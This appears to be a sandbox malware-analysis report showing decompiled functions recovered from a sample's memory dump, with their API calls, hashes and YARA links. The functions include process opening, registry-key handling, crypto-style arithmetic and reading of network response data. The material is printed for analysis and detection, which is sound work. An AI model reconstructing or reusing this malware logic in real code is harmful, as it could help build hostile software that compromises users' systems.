0x00f914cf
0x00f914d7
0x00f914dc
0x00f914ee
0x00f914f0
0x00f914f6
0x00f914f6
0x00f914ff
0x00f914ff
0x00f91501
0x00f91507
0x00f91507
0x00f9150a
0x00f91510
0x00f91513
0x00f9151c
0x00000000
0x00000000
0x00000000
0x00f9151c
0x00f91470
0x00f9146a
0x00f91452
0x00f91522
0x00f91522
0x00f91528
0x00f91528
0x00f9152e
0x00f9152e
0x00f91537
0x00f9153d
0x00f9153d
0x00f913f9
0x00f91546

APIs

SysAllocString.OLEAUT32(00F992D0), ref: 00F91404
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00F914E6
SysFreeString.OLEAUT32(00000000), ref: 00F914FF
SysFreeString.OLEAUT32(?), ref: 00F9152E

Strings

ht, xrefs: 00F914E6

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID: ht
API String ID: 1885612795-2699322969
Opcode ID: f9821223af0f3f97801df182f69e56200a8da1a2052a3180e748015613cf7665
Instruction ID: 2ac4e008d3bee5a55bde5243bb887721490c53ca7ea940cbf481cd786249bf4e
Opcode Fuzzy Hash: f9821223af0f3f97801df182f69e56200a8da1a2052a3180e748015613cf7665
Instruction Fuzzy Hash: 9D514F75D0050AEFDF00DFA8C8888AEB7B9FF89704B154598E916EB220D7729D01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F963CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00F963CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00F92BF3(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xf9a2d0; // 0x310d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xf9b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xf9b92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xf9a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00f963cd
0x00f963d4
0x00f963d8
0x00f963dd
0x00f963e4
0x00f963e7
0x00f963f1
0x00f963f6
0x00f96402
0x00f96409
0x00f96413
0x00f96413
0x00f9640b
0x00f9640b
0x00f9640b
0x00f9640b
0x00f96419
0x00f9641c
0x00f96424
0x00f96427
0x00f9642a
0x00f9642d
0x00f96432
0x00f9643b
0x00f96448
0x00f9643d
0x00f96443
0x00f96443
0x00f9644e
0x00f9644e
0x00f96456

APIs

Part of subcall function 00F92BF3: SysAllocString.OLEAUT32(?), ref: 00F92C4F
Part of subcall function 00F92BF3: SysAllocString.OLEAUT32(0070006F), ref: 00F92C63
Part of subcall function 00F92BF3: SysAllocString.OLEAUT32(00000000), ref: 00F92C75
Part of subcall function 00F92BF3: SysFreeString.OLEAUT32(00000000), ref: 00F92CD9

memset.NTDLL ref: 00F963F1
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00F9642D
GetLastError.KERNEL32 ref: 00F9643D
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00F9644E

Strings

<, xrefs: 00F96402

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 666e72bd8821a753b274823d99bc8441757c447e77c6dc6c451e158f970489e9
Instruction ID: f0e00b834ef61f73880209c83dbead8bed6e1f5036f94470ad5d781322630acb
Opcode Fuzzy Hash: 666e72bd8821a753b274823d99bc8441757c447e77c6dc6c451e158f970489e9
Instruction Fuzzy Hash: 7D110971D00218ABEF10EFA9DC85BD97BF8BB08794F04802AF905E7251D7749544EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F96027, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00F96027(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xf9a37c; // 0x40a9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xf9a37c; // 0x40a9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xf9a030) {
					HeapFree( *0xf9a290, 0, _t8);
				}
				_t14[1] = E00F949BA(_v0);
				_t11 =  *0xf9a37c; // 0x40a9630
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}

0x00f96027
0x00f96027
0x00f96030
0x00f96040
0x00f96040
0x00f96045
0x00f9604a
0x00000000
0x00000000
0x00f9603a
0x00f9603a
0x00f9604c
0x00f96050
0x00f96062
0x00f96062
0x00f96072
0x00f96075
0x00f9607a
0x00f9607e
0x00f96084

APIs

RtlEnterCriticalSection.NTDLL(040A95F0), ref: 00F96030
Sleep.KERNEL32(0000000A,?,?,00F92F44,?,?,?,?,?,00F944F9,?,00000001), ref: 00F9603A
HeapFree.KERNEL32(00000000,00000000,?,?,00F92F44,?,?,?,?,?,00F944F9,?,00000001), ref: 00F96062
RtlLeaveCriticalSection.NTDLL(040A95F0), ref: 00F9607E

Strings

Ut, xrefs: 00F96062

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 25161f82246b3f4db188f93db07b512a25006a26ef92e3f55b3c241b1abd7f81
Instruction ID: 0ece11c28adb90c502a5362fabf265c98de865de5fde629e6fa8c4948a0755b0
Opcode Fuzzy Hash: 25161f82246b3f4db188f93db07b512a25006a26ef92e3f55b3c241b1abd7f81
Instruction Fuzzy Hash: 65F0F8716042489BFB209F38EC89F1A77A4AB14741B05840AF955D6271C671E814FB66

Uniqueness

Uniqueness Score: -1.00%

Function 00F9461D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00F9461D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xf9a37c; // 0x40a9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xf9a37c; // 0x40a9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xf9a37c; // 0x40a9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xf9b882) {
					HeapFree( *0xf9a290, 0, _t10);
					_t7 =  *0xf9a37c; // 0x40a9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00f9461d
0x00f94626
0x00f94636
0x00f94636
0x00f9463b
0x00f94640
0x00000000
0x00000000
0x00f94630
0x00f94630
0x00f94642
0x00f94647
0x00f9464b
0x00f9465e
0x00f94664
0x00f94664
0x00f9466d
0x00f9466f
0x00f94673
0x00f94679

APIs

RtlEnterCriticalSection.NTDLL(040A95F0), ref: 00F94626
Sleep.KERNEL32(0000000A,?,?,00F92F44,?,?,?,?,?,00F944F9,?,00000001), ref: 00F94630
HeapFree.KERNEL32(00000000,?,?,?,00F92F44,?,?,?,?,?,00F944F9,?,00000001), ref: 00F9465E
RtlLeaveCriticalSection.NTDLL(040A95F0), ref: 00F94673

Strings

Ut, xrefs: 00F9465E

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 8c3cb0f881a903c84fe54ea1e45ddc74e179c48d3940dfab18ea62612ab48a24
Instruction ID: ee10fc49fd5451ddf43dd889d5bcec1eabe3738598eaa01f75e6cb9e2b111787
Opcode Fuzzy Hash: 8c3cb0f881a903c84fe54ea1e45ddc74e179c48d3940dfab18ea62612ab48a24
Instruction Fuzzy Hash: 74F0F8B4A04208DFFB18CF38EC59F15B7A4AB5A701B05801AE916C7370C771AC01FE55

Uniqueness

Uniqueness Score: -1.00%

Function 00F92A18, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F92A18(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xf9a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xf9a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xf9a2b0 = _t6;
				 *0xf9a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xf9a2ac = _t7;
				if(_t7 == 0) {
					 *0xf9a2ac =  *0xf9a2ac | 0xffffffff;
				}
				return 0;
			}

0x00f92a20
0x00f92a28
0x00f92a2d
0x00000000
0x00f92a7a
0x00f92a2f
0x00f92a37
0x00f92a77
0x00000000
0x00f92a77
0x00f92a39
0x00f92a3e
0x00f92a50
0x00f92a55
0x00f92a5b
0x00f92a63
0x00f92a68
0x00f92a6a
0x00f92a6a
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00F9446F,?,?,00000001), ref: 00F92A20
GetVersion.KERNEL32(?,00000001), ref: 00F92A2F
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00F92A3E
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00F92A5B
GetLastError.KERNEL32(?,00000001), ref: 00F92A7A

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 56636b448dde134cd4bf6c0b45c8900d1e87079a7fcac5d4dfeb4fdd6f79be3c
Instruction ID: 1a134fbf29e46aa9b28f8e3e3ee9496a82da6da122a6abd98524c213760e7ca7
Opcode Fuzzy Hash: 56636b448dde134cd4bf6c0b45c8900d1e87079a7fcac5d4dfeb4fdd6f79be3c
Instruction Fuzzy Hash: B8F03A71A89309AFEBA08F79AC097153BA8B708750F11451FE256C52F0E7B54400FF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00F9202E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00F9202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0xf9a38c);
					_t97 = 0x80000002;
					L6:
					_t60 = E00F933FA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E00F94B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E00F92A03(_a8);
						goto L29;
					}
					_t65 =  *0xf9a2d0; // 0x310d5a8
					_t16 = _t65 + 0xf9b908; // 0x65696c43
					_t68 = E00F933FA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d00f990
						if(E00F95C15(_t103,  *_t33, _t97, _a8,  *0xf9a384,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xf9a2d0; // 0x310d5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0xf9ba0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xf9b927; // 0x55434b48
								_t73 = _t34;
							}
							if(E00F9762C(_t73,  *0xf9a384,  *0xf9a388,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0xf9a2d0; // 0x310d5a8
									_t44 = _t75 + 0xf9b893; // 0x74666f53
									_t78 = E00F933FA(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d00f990
										E00F933B7( *_t47, _t97, _a8,  *0xf9a388, _a24);
										_t49 = _t107 + 0x10; // 0x3d00f990
										E00F933B7( *_t49, _t97, _t105,  *0xf9a380, _a16);
										E00F92A03(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d00f990
									E00F933B7( *_t40, _t97, _a8,  *0xf9a388, _a24);
									_t43 = _t107 + 0x10; // 0x3d00f990
									E00F933B7( *_t43, _t97, _a8,  *0xf9a380, _a16);
								}
								if( *_t107 != 0) {
									E00F92A03(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d00f990
					if(E00F95419( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d00f990
							E00F95C15(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E00F92A03(_t106);
						_t104 = _a16;
					}
					E00F92A03(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E00F97973(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0xf9a38c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x00f9202e
0x00f92037
0x00f9203e
0x00f92043
0x00f920b0
0x00f920b6
0x00f920bb
0x00f920c4
0x00f920cb
0x00f920ce
0x00f92242
0x00f92249
0x00f92249
0x00f9224e
0x00f92250
0x00f92250
0x00f92259
0x00f92259
0x00f920d4
0x00f920e0
0x00f92238
0x00f9223b
0x00000000
0x00f9223b
0x00f920e6
0x00f920eb
0x00f920f4
0x00f920fb
0x00f920fe
0x00f92148
0x00f92148
0x00f9215b
0x00f92165
0x00f9216d
0x00f92172
0x00f9217c
0x00f9217c
0x00f92174
0x00f92174
0x00f92174
0x00f92174
0x00f9219e
0x00f921a6
0x00f921d4
0x00f921d9
0x00f921e2
0x00f921e7
0x00f921eb
0x00f9221d
0x00f921ed
0x00f921fa
0x00f921fd
0x00f9220d
0x00f92210
0x00f92216
0x00f92216
0x00f921a8
0x00f921b5
0x00f921b8
0x00f921ca
0x00f921cd
0x00f921cd
0x00f92227
0x00f92233
0x00f92229
0x00f9222c
0x00f9222c
0x00f92227
0x00f9219e
0x00000000
0x00f92165
0x00f9210d
0x00f92117
0x00f92119
0x00f9211e
0x00f92122
0x00f92124
0x00f9212f
0x00f92132
0x00f92132
0x00f92138
0x00f9213d
0x00f9213d
0x00f92143
0x00000000
0x00f92143
0x00f92048
0x00000000
0x00f9206f
0x00f9206f
0x00f9207b
0x00f9208e
0x00f92094
0x00f9209c
0x00000000
0x00f9209c

APIs

StrChrA.SHLWAPI(00F97319,0000005F,00000000,00000000,00000104), ref: 00F92061
lstrcpy.KERNEL32(?,?), ref: 00F9208E

Part of subcall function 00F933FA: lstrlen.KERNEL32(?,00F9A380,74E47FC0,00000000,00F92788,?,?,?,?,?,00F93EAC,?), ref: 00F93403
Part of subcall function 00F933FA: mbstowcs.NTDLL ref: 00F9342A
Part of subcall function 00F933FA: memset.NTDLL ref: 00F9343C

Part of subcall function 00F933B7: lstrlenW.KERNEL32(00F97319,?,?,00F92202,3D00F990,80000002,00F97319,00F9742D,74666F53,4D4C4B48,00F9742D,?,3D00F990,80000002,00F97319,?), ref: 00F933D7

Part of subcall function 00F92A03: RtlFreeHeap.NTDLL(00000000,00000000,00F94072,00000000,?,?,00000000,?,?,?,?,?,?,00F944AE,00000000), ref: 00F92A0F

lstrcpy.KERNEL32(?,00000000), ref: 00F920B0

Strings

\, xrefs: 00F92094

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: \
API String ID: 3924217599-2967466578
Opcode ID: 67be5fd16656fde09ef35a6401f3d4cadec008a0465705992aafc02ffdfbd2a2
Instruction ID: 913972e6c83b4f26b5f135b93d99d61347cbea5690a3938f8ca23ea07a53827e
Opcode Fuzzy Hash: 67be5fd16656fde09ef35a6401f3d4cadec008a0465705992aafc02ffdfbd2a2
Instruction Fuzzy Hash: DE51777250020EBFEF629FA4DC41EAA37B9EF08310F108559FA1592021D73ADA25FF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F91E91, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F91E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00F95278(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00F92399(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00F93C32(_t101,  &_v428, _a8, _t96 - _t81);
					E00F93C32(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00F92399(_t101,  &E00F9A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00F92399(_a16, _a4);
						E00F9114C(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00F97F56();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00F97F50();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00F95381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00F945B4(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00F95936(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00F9A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00f91e94
0x00f91ea0
0x00f91ea6
0x00f91eab
0x00f91eaf
0x00f92021
0x00f92025
0x00f92025
0x00f91eb5
0x00f91eb9
0x00f91ebf
0x00f91ec0
0x00f91ecb
0x00f91ed1
0x00f91ed6
0x00f91ed9
0x00f91ef3
0x00f91f02
0x00f91f0e
0x00f91f18
0x00f91f1d
0x00f91f1f
0x00f91f22
0x00f91fd9
0x00f91fdf
0x00f91ff0
0x00f92003
0x00f92019
0x00000000
0x00f9201e
0x00f91f2b
0x00f91f32
0x00f91f36
0x00f91f3c
0x00f91f3e
0x00f91f40
0x00f91f42
0x00f91f44
0x00f91f4e
0x00f91f53
0x00f91f55
0x00f91f57
0x00f91f58
0x00f91f59
0x00f91f5a
0x00f91f61
0x00f91f68
0x00f91f6b
0x00f91f6b
0x00f91f38
0x00f91f38
0x00f91f38
0x00f91f73
0x00f91f7b
0x00f91f87
0x00f91f8c
0x00f91f8c
0x00f91f91
0x00000000
0x00000000
0x00f91f93
0x00f91f96
0x00f91fa3
0x00000000
0x00000000
0x00f91fa5
0x00f91fa5
0x00f91fb2
0x00f91f8c
0x00f91f91
0x00000000
0x00000000
0x00000000
0x00f91f91
0x00f91fbc
0x00f91fbf
0x00f91fc2
0x00f91fc9
0x00f91fc9
0x00f91fd6
0x00000000
0x00f91fd6
0x00f91ec2
0x00f91ec6
0x00f91ec7
0x00f91ec9
0x00000000
0x00000000
0x00000000
0x00f91ec9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00F91F44
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00F91F5A
memset.NTDLL ref: 00F92003
memset.NTDLL ref: 00F92019

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 02a75bf386602708f874edd9d5de408b1c5cb1742b18f19a9b0e0b475015add5
Instruction ID: 7d226eed6d78128ce0d83b6c434e087e69ff39af73cb68bc85edeb2c713f6414
Opcode Fuzzy Hash: 02a75bf386602708f874edd9d5de408b1c5cb1742b18f19a9b0e0b475015add5
Instruction Fuzzy Hash: 7941B471A0021AAFEF10DF68CC41BEE77B5FF45720F004165F919A7281DB74AE459B81

Uniqueness

Uniqueness Score: -1.00%

Function 00F9467C, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00F9467C(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0xf9a148() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00F95C4E(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0xf9a2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00F92A03(_v20);
							if(_v8 == 0) {
								_v8 = E00F96589(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x00f94684
0x00f94687
0x00f94690
0x00f94693
0x00f94696
0x00f9469e
0x00f9479c
0x00f947a7
0x00f947aa
0x00f947b2
0x00f947b9
0x00f947b9
0x00f947ac
0x00f947af
0x00f947af
0x00000000
0x00f947af
0x00f946a7
0x00000000
0x00000000
0x00f946b0
0x00f946b1
0x00f946b3
0x00f946bc
0x00f94793
0x00000000
0x00f94793
0x00f946c8
0x00f946cf
0x00f946d2
0x00f94781
0x00f94788
0x00f94788
0x00f9478e
0x00000000
0x00000000
0x00000000
0x00000000
0x00f946d8
0x00f946d8
0x00f946d8
0x00f946d8
0x00f946dd
0x00f946df
0x00f946df
0x00f946ec
0x00f946f4
0x00000000
0x00000000
0x00f946f6
0x00f94703
0x00f94709
0x00f94709
0x00f9470c
0x00000000
0x00000000
0x00f94719
0x00f9472d
0x00f94763
0x00f94766
0x00f94769
0x00f94771
0x00f9477c
0x00f9477c
0x00000000
0x00f94771
0x00f9472f
0x00f94736
0x00f9473e
0x00000000
0x00000000
0x00f94740
0x00f9474b
0x00f9474e
0x00000000
0x00f94755
0x00f94755
0x00000000
0x00f94755
0x00f9474e
0x00f94716
0x00000000
0x00f94758
0x00f94758
0x00000000

APIs

GetLastError.KERNEL32 ref: 00F9479C

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

GetLastError.KERNEL32 ref: 00F94710
